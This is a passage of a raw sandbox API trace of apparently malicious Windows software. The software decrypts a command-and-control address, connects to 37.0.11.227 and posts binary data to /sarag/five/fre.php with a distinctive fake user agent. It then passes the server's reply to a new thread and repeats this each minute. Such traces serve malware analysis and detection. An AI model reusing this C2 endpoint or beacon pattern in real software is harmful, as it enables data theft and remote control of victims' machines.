hHeap=0x690000) returned 1 [0304.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.379] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0304.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.380] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0304.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.382] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0304.382] GetProcessHeap () returned 0x690000 [0304.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0304.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.383] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.384] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.385] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.386] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.386] GetProcessHeap () returned 0x690000 [0304.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0304.386] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.387] GetProcessHeap () returned 0x690000 [0304.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0304.389] GetProcessHeap () returned 0x690000 [0304.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0304.389] GetProcessHeap () returned 0x690000 [0304.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0304.390] GetProcessHeap () returned 0x690000 [0304.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0304.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.391] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0304.405] GetProcessHeap () returned 0x690000 [0304.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0304.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.407] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0304.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.410] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.411] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.411] GetProcessHeap () returned 0x690000 [0304.411] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0304.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.413] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0304.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.414] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0304.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.415] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0304.415] GetProcessHeap () returned 0x690000 [0304.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.416] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0304.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.419] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0304.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.420] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0304.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.421] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0304.421] GetProcessHeap () returned 0x690000 [0304.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0304.421] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0304.421] GetProcessHeap () returned 0x690000 [0304.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0304.421] socket (af=2, type=1, protocol=6) returned 0xa08 [0304.422] connect (s=0xa08, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0304.451] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0304.451] GetProcessHeap () returned 0x690000 [0304.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0304.451] GetProcessHeap () returned 0x690000 [0304.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0304.453] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.454] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.454] GetProcessHeap () returned 0x690000 [0304.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0304.454] GetProcessHeap () returned 0x690000 [0304.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.455] GetProcessHeap () returned 0x690000 [0304.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0304.455] GetProcessHeap () returned 0x690000 [0304.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0304.456] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.456] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.456] GetProcessHeap () returned 0x690000 [0304.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0304.457] GetProcessHeap () returned 0x690000 [0304.457] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.457] send (s=0xa08, buf=0x6ad508*, len=242, flags=0) returned 242 [0304.459] send (s=0xa08, buf=0x6aba40*, len=159, flags=0) returned 159 [0304.459] GetProcessHeap () returned 0x690000 [0304.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0304.459] recv (in: s=0xa08, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0304.564] GetProcessHeap () returned 0x690000 [0304.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0304.564] GetProcessHeap () returned 0x690000 [0304.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0304.565] GetProcessHeap () returned 0x690000 [0304.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0304.565] GetProcessHeap () returned 0x690000 [0304.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0304.566] closesocket (s=0xa08) returned 0 [0304.567] GetProcessHeap () returned 0x690000 [0304.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0304.567] GetProcessHeap () returned 0x690000 [0304.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.578] GetProcessHeap () returned 0x690000 [0304.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0304.578] GetProcessHeap () returned 0x690000 [0304.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0304.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x430) returned 0xa08 [0304.581] Sleep (dwMilliseconds=0xea60) [0304.582] GetProcessHeap () returned 0x690000 [0304.582] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0304.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.592] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0304.603] GetProcessHeap () returned 0x690000 [0304.603] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0304.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.605] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0304.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.606] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.607] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.607] GetProcessHeap () returned 0x690000 [0304.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0304.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.608] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0304.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.609] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0304.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.629] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0304.629] GetProcessHeap () returned 0x690000 [0304.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.630] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.631] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.633] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.634] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.634] GetProcessHeap () returned 0x690000 [0304.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0304.634] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.634] GetProcessHeap () returned 0x690000 [0304.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0304.635] GetProcessHeap () returned 0x690000 [0304.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.635] GetProcessHeap () returned 0x690000 [0304.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0304.635] GetProcessHeap () returned 0x690000 [0304.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0304.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.636] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.642] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0304.649] GetProcessHeap () returned 0x690000 [0304.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0304.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.650] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0304.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.651] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.652] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.652] GetProcessHeap () returned 0x690000 [0304.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0304.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.654] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0304.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.655] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0304.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.656] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0304.656] GetProcessHeap () returned 0x690000 [0304.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0304.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.658] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0304.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.659] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0304.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.661] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0304.661] GetProcessHeap () returned 0x690000 [0304.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0304.661] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0304.661] GetProcessHeap () returned 0x690000 [0304.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0304.661] socket (af=2, type=1, protocol=6) returned 0xa0c [0304.663] connect (s=0xa0c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0304.690] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0304.690] GetProcessHeap () returned 0x690000 [0304.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0304.690] GetProcessHeap () returned 0x690000 [0304.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0304.691] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.692] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.692] GetProcessHeap () returned 0x690000 [0304.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0304.692] GetProcessHeap () returned 0x690000 [0304.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.693] GetProcessHeap () returned 0x690000 [0304.693] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0304.693] GetProcessHeap () returned 0x690000 [0304.693] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0304.694] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0304.695] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.695] GetProcessHeap () returned 0x690000 [0304.695] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0304.695] GetProcessHeap () returned 0x690000 [0304.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0304.696] send (s=0xa0c, buf=0x6ad508*, len=242, flags=0) returned 242 [0304.696] send (s=0xa0c, buf=0x6aba40*, len=159, flags=0) returned 159 [0304.696] GetProcessHeap () returned 0x690000 [0304.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0304.696] recv (in: s=0xa0c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0304.784] GetProcessHeap () returned 0x690000 [0304.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0304.785] GetProcessHeap () returned 0x690000 [0304.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0304.785] GetProcessHeap () returned 0x690000 [0304.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0304.786] GetProcessHeap () returned 0x690000 [0304.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0304.786] closesocket (s=0xa0c) returned 0 [0304.787] GetProcessHeap () returned 0x690000 [0304.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0304.787] GetProcessHeap () returned 0x690000 [0304.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0304.787] GetProcessHeap () returned 0x690000 [0304.787] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0304.787] GetProcessHeap () returned 0x690000 [0304.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0304.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc44) returned 0xa0c [0304.789] Sleep (dwMilliseconds=0xea60) [0304.791] GetProcessHeap () returned 0x690000 [0304.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0304.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.793] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.799] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0304.806] GetProcessHeap () returned 0x690000 [0304.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0304.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.808] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0304.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.816] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.817] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.817] GetProcessHeap () returned 0x690000 [0304.820] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0304.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.821] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0304.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.822] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0304.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0304.823] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0304.823] GetProcessHeap () returned 0x690000 [0304.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0304.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.824] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0304.826] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.826] 